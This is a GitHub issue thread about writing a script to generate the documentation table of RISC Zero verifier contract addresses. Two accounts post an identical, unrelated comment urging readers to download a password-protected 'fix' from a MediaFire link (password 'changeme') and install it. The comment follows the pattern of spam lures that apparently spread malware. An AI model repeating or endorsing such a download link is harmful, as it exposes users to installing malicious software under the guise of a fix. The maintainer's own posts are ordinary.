### ISSUE TITLE
Create a script to generate the table of verifier addresses that goes into our documentation

### ISSUE THREAD

**Issue by nategraf** [risc0/risc0-ethereum#212]
As we have more deployments, it's only going to get more unwieldy to manually write the table of addresses in our docs [1]. We should write a script to generate it instead.

[1] https://dev.risczero.com/api/blockchain-integration/contracts/verifier

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by nategraf** [comment]
Here is an example that I like from the Across documentation https://docs.across.to/reference/contract-addresses
